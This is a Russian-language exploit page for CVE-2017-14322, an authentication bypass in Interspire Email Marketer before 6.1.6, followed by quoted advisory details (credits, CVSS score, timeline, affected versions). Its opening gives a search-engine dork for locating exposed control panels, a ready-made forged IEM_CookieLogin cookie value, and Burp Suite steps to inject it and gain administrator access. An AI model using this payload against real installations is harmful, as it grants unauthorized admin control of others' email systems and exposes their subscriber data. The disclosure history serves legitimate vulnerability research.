
CVE-2017-14322 Interspire Email Marketer (emailmarketer) Эксплойт
intitle:"Control Panel" + emailmarketer
Добавьте Match and Replace для заголовка запроса, как показано ниже:
Match: ^Cookie.*$
Replace: Cookie: IEM_CookieLogin=YTo0OntzOjQ6InVzZXIiO3M6MToiMSI7czo0OiJ0aW1lIjtpOjE1MDU0NzcyOTQ7czo0OiJyYW5kIjtiOjE7czo4OiJ0YWtlbWV0byI7czo5OiJpbmRleC5waHAiO30%3D
Когда вы открываете сайт, первый раз он не сработает, так как заголовок Cookie отсутствует. Обновите сайт второй раз, используя прокси Burp с добавленным выше правилом, и вы увидите то, что хотели. Убедитесь, что отмечена опция «Intercept Client Requests»
Interspire Email Marketer - Обход удаленной аутентификации администратора
Hakan Küsne, Infoteam Security (CH)
CVE-2017-14322
CVSS Base Score: 9.8 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F/RL:O
2017-09-12 Уязвимость обнаружена 2017-09-12 Обнаружено, что разработчик уже исправил это, но никогда не сообщал клиентам, оставив сотни уязвимыми в дикой природе 2017-10-17 Публичное раскрытие
Interspire Email Marketer до версии 6.1.6
http://www.interspire.com/emailmarketer/
Функция, отвечающая за проверку, авторизован ли уже пользователь, в файле init.php в Interspire Email Marketer (IEM) до версии 6.1.6 позволяет удаленным злоумышленникам обойти аутентификацию и получить административный доступ с помощью файла cookie IEM_CookieLogin со специально подобранным значением. Вдобавок, если у клиента нет ежегодного плана обслуживания, приложение сообщает, что оно находится на последней доступной версии и обновлений нет.
Уязвимости были обнаружены во время реагирования на инцидент на скомпрометированном экземпляре приложения.
Подробности предоставлены здесь: https://security.infoteam.ch/en/blog/posts/narrative-of-an-incident-response-from-compromise-to-the-publication-of-the-weakness.html
Разработчик исправил уязвимость в версии 6.1.6, но никогда не сообщал об этом своим клиентам конкретно.
Этот эксплойт предназначен только для образовательных целей и не несет ответственности за ваши собственные действия.